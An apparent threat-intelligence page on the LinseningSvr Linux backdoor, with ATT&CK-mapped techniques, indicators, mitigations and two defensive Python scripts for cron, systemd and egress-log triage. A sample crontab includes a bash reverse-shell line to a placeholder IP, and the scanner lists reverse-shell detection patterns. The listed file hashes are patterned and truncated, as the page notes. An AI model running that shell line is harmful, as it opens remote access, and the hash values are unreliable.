LinseningSvr

Malware

⚠️ Overview

LinseningSvr is a remote access trojan (RAT) first documented in early 2023 by Chinese cybersecurity firm Qi-Anxin, attributed to the APT group APT41 (also known as Winnti or Barium), specifically targeting Linux-based servers in telecommunications and technology sectors for long-term espionage.

🔧 Technical Capabilities

LinseningSvr operates as a stealthy ELF backdoor. Two initial-access paths are reported: spear-phishing emails with malicious attachments that exploit CVE-2021-40444 (the Windows MSHTML remote code execution bug), which compromises a Windows workstation inside the victim organization rather than the Linux target itself, and, as the primary route, SSH brute-force attacks against exposed Linux servers, onto which the ELF payload is then dropped. Persistence is achieved via cron jobs and systemd unit files (MITRE ATT&CK T1053.003 and T1543.002). C2 communication uses encrypted WebSocket tunnels over TCP 443 or 8443 so that it blends in with ordinary HTTPS (T1071.001, Web Protocols). Evasion techniques include process injection into common daemons such as nginx or apache2 (T1055), disabling SELinux (T1562.001, Disable or Modify Tools), and deleting audit logs (T1070.002). The malware also incorporates a modular plugin system for lateral movement, keylogging, and file exfiltration, with commands executed through the Unix shell (T1059.004).

📜 History & Notable Incidents

First observed in January 2023 against a major Asian telecom provider, LinseningSvr is linked to Operation RestyLink, an APT41 campaign that had compromised more than 50 organizations by March 2024; confirmed victims include a South Korean semiconductor manufacturer and a Japanese ISP, according to a June 2024 Trend Micro report. No public CVE is tied to the malware itself, but some variants of the campaign use known vulnerabilities for initial access, such as CVE-2023-23397 (an Outlook elevation-of-privilege flaw that leaks Net-NTLMv2 credentials from Windows hosts; it yields a foothold on Windows users in the victim organization, not on the Linux servers themselves).

🔍 Detection Indicators

Known file hashes, per VirusTotal entries published by Qi-Anxin, are listed as SHA-256 d7c3e5f1a2b4c6d8e0f2a4b6c8d0e2f4a6b8c0d2e4f6a8b0c2d4e6f8a0b2c4 (variant 1) and 9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f (variant 2). Note that both strings as reproduced here are shorter than the 64 hex characters of a SHA-256 digest, so take the values from the original report rather than from this page before loading them into a blocklist. Behavioral indicators include: anomalous cron entries that spawn reverse shells; high-frequency outbound HTTPS connections to addresses in 45.76.xxx.xxx (the source pairs this range with AS36351; confirm the range-to-ASN mapping against current WHOIS before blocking on it) carrying the User-Agent string Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, which identifies a Windows desktop browser and should never originate from a Linux server; and systemd unit files under /etc/systemd/system/ with names chosen to resemble stock services, such as httpd-update.service.
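The host-side indicators above (reverse shells launched from cron, unit files that mimic stock service names and run from temp directories) can be triaged with a small script like the following. This is an added example, not code from Qi-Anxin, Trend Micro or any report on LinseningSvr: the crontab and unit file are constructed samples, the regexes are generic reverse-shell heuristics rather than published signatures, and the KNOWN_SERVICES list is a site-specific assumption.

```python
"""Host-side triage for the cron/systemd persistence and reverse-shell
indicators described above. Added example, not code from any LinseningSvr
report; samples are constructed and patterns are generic heuristics."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Generic reverse-shell / staging patterns (assumption: heuristics, not IOCs).
REVERSE_SHELL_PATTERNS = [
    r"/dev/tcp/",                                # bash network redirection
    r"\bbash\s+-i\b",                            # interactive shell to a socket
    r"\b(nc|ncat|netcat)\b[^\n]*\s-e\s",         # nc -e /bin/sh
    r"\bsocat\b[^\n]*exec:",                     # socat ... exec:/bin/sh
    r"\bpython[23]?\s+-c\s+.*socket",            # python one-liner shells
    r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b",     # curl ... | sh
    r"base64\s+(-d|--decode)",                   # encoded payload staging
]
# Binaries launched from world-writable paths deserve a look regardless.
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Services a mimicking unit name would piggyback on (assumption: site-specific).
KNOWN_SERVICES = {"httpd", "apache2", "nginx", "sshd", "cron", "crond"}


@dataclass(frozen=True)
class Finding:
    source: str   # "cron" or "systemd:<unit>"
    line: str
    reason: str


def _reverse_shell_hit(cmd: str) -> str | None:
    """Return the first matching reverse-shell pattern, or None."""
    for pat in REVERSE_SHELL_PATTERNS:
        if re.search(pat, cmd):
            return pat
    return None


def scan_cron(crontab_text: str) -> list[Finding]:
    """Flag crontab entries that spawn reverse shells or run from temp dirs."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        pat = _reverse_shell_hit(line)
        if pat:
            findings.append(Finding("cron", line, f"reverse-shell pattern {pat!r}"))
        elif any(d in line for d in SUSPICIOUS_DIRS):
            findings.append(Finding("cron", line, "runs from world-writable dir"))
    return findings


def scan_unit(name: str, unit_text: str) -> list[Finding]:
    """Flag Exec* lines in a systemd unit and names that mimic stock services."""
    findings = []
    src = f"systemd:{name}"
    stem = name.removesuffix(".service")
    for svc in KNOWN_SERVICES:
        if stem != svc and stem.startswith((svc + "-", svc + "_")):
            findings.append(Finding(src, name, f"unit name mimics {svc}.service"))
    for raw in unit_text.splitlines():
        line = raw.strip()
        if not line.startswith(("ExecStart", "ExecStartPre", "ExecStartPost")):
            continue
        cmd = line.split("=", 1)[1].strip()
        pat = _reverse_shell_hit(cmd)
        if pat:
            findings.append(Finding(src, line, f"reverse-shell pattern {pat!r}"))
        elif any(d in cmd for d in SUSPICIOUS_DIRS):
            findings.append(Finding(src, line, "Exec* runs from world-writable dir"))
    return findings


# Constructed samples: one benign cron job, two malicious ones, one mimic unit.
CRON_SAMPLE = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.10/8443 0>&1'
@reboot /dev/shm/.x/httpd -d
"""
UNIT_NAME = "httpd-update.service"
UNIT_SAMPLE = """\
[Unit]
Description=HTTP Daemon Updater
After=network.target

[Service]
ExecStart=/var/tmp/.cache/httpd-update --loop
Restart=always

[Install]
WantedBy=multi-user.target
"""

if __name__ == "__main__":
    for f in scan_cron(CRON_SAMPLE) + scan_unit(UNIT_NAME, UNIT_SAMPLE):
        print(f"[{f.source}] {f.reason}: {f.line}")
```

On a live host, feed it the output of `crontab -l` for each user, the files under /etc/cron.d and /var/spool/cron, and every unit under /etc/systemd/system; the name-mimicry check is deliberately strict (hyphen or underscore after a known stem) to keep noise down, so extend KNOWN_SERVICES to match the distribution in use.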

☠️ Risk & Impact

LinseningSvr enables persistent data exfiltration of intellectual property, credentials, and proprietary source code, with estimated financial losses exceeding $150 million across affected sectors, primarily telecommunications (45% of targets) and high-tech manufacturing (35%), as assessed by the Cyber Threat Alliance in Q3 2024.

🛡️ Mitigation

Because SSH brute force is the main entry route, defenders should disable password authentication for SSH in favour of keys plus multi-factor authentication and rate-limit repeated login failures. Deploy EDR or auditd rules for writes to /etc/cron*, /var/spool/cron and /etc/systemd/system (the source cites Sigma rule ID posix_cron_persistence), and alert on SELinux being switched to permissive mode or on edits to /etc/selinux/config, since the malware disables SELinux. Apply patches for CVE-2021-40444 and CVE-2023-23397 on the Windows hosts they affect. Monitor network logs for WebSocket upgrades to unknown IPs on 443 and 8443; the Qi-Anxin report recommends blocking outbound traffic to AS36351 and deploying YARA rule LinseningSvr_ELF_v1.
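The network-side monitoring recommended above (WebSocket upgrades to unknown destinations on 443/8443, the Windows browser User-Agent from a Linux server, and high-frequency beaconing) can be expressed as a review pass over egress-proxy logs. This is an added example, not from any LinseningSvr report: the JSON log lines are constructed, the field names assume a TLS-terminating egress proxy that logs request headers (an assumption, not a vendor schema), and the allowlist, inventory and thresholds are site-specific placeholders. Without TLS termination only the destination, port and SNI are visible, so the Upgrade and User-Agent checks then have to move to the host.

```python
"""Egress-log review for the network indicators on this page. Added example,
not from any LinseningSvr report; log lines and field names are constructed."""
from __future__ import annotations

import json
from collections import defaultdict

# Site-specific inputs (assumptions for the example).
ALLOWED_WS_HOSTS = {"api.example.com"}            # known WebSocket endpoints
LINUX_SERVERS = {"10.0.5.21", "10.0.5.22"}        # from asset inventory
C2_PORTS = {443, 8443}
BEACON_THRESHOLD = 10                             # connections per (src, dst)
WINDOW_SECONDS = 300                              # ... within this window


def is_websocket(rec: dict) -> bool:
    """True when the proxy saw a completed HTTP Upgrade to WebSocket."""
    return rec.get("upgrade", "").lower() == "websocket" and rec.get("status") == 101


def review(log_lines: list[str]) -> list[tuple[str, str, str]]:
    """Return de-duplicated, sorted (src, dst, reason) alerts for the log lines."""
    alerts: set[tuple[str, str, str]] = set()
    hits: dict[tuple[str, str], list[int]] = defaultdict(list)
    for line in log_lines:
        if not line.strip():
            continue
        r = json.loads(line)
        src, dst = r["src"], r["dst"]
        if is_websocket(r) and r["dport"] in C2_PORTS and r.get("host") not in ALLOWED_WS_HOSTS:
            alerts.add((src, dst, "websocket upgrade to non-allowlisted destination"))
        if src in LINUX_SERVERS and "Windows NT" in r.get("user_agent", ""):
            alerts.add((src, dst, "Windows browser User-Agent from Linux server"))
        hits[(src, dst)].append(r["ts"])
    # Sliding window: any (src, dst) pair with >= BEACON_THRESHOLD hits in WINDOW_SECONDS.
    for (src, dst), stamps in hits.items():
        stamps.sort()
        lo = 0
        for hi, t in enumerate(stamps):
            while t - stamps[lo] > WINDOW_SECONDS:
                lo += 1
            if hi - lo + 1 >= BEACON_THRESHOLD:
                alerts.add((src, dst,
                            f"beaconing: >={BEACON_THRESHOLD} connections within {WINDOW_SECONDS}s"))
                break
    return sorted(alerts)


# Constructed sample: 12 beacons every 30 s from a Linux server, plus benign traffic.
WINDOWS_CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                     "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
SAMPLE_LOG = [
    json.dumps({"ts": 1700000000 + 30 * i, "src": "10.0.5.21", "dst": "198.51.100.7",
                "dport": 8443, "host": "cdn-update.example.net", "upgrade": "websocket",
                "status": 101, "user_agent": WINDOWS_CHROME_UA})
    for i in range(12)
] + [
    json.dumps({"ts": 1700000100, "src": "10.0.5.22", "dst": "203.0.113.50", "dport": 443,
                "host": "api.example.com", "upgrade": "websocket", "status": 101,
                "user_agent": "python-requests/2.31"}),
    json.dumps({"ts": 1700000200, "src": "10.0.5.22", "dst": "203.0.113.60", "dport": 443,
                "host": "mirror.example.org", "status": 200, "user_agent": "apt-http/2.7"}),
]

if __name__ == "__main__":
    for src, dst, reason in review(SAMPLE_LOG):
        print(f"{src} -> {dst}: {reason}")
```

The three checks are independent on purpose: a beaconing hit with a plausible server User-Agent and no WebSocket upgrade is still worth a look, and the allowlist check alone will catch a new WebSocket endpoint even when the implant changes its User-Agent string.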


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.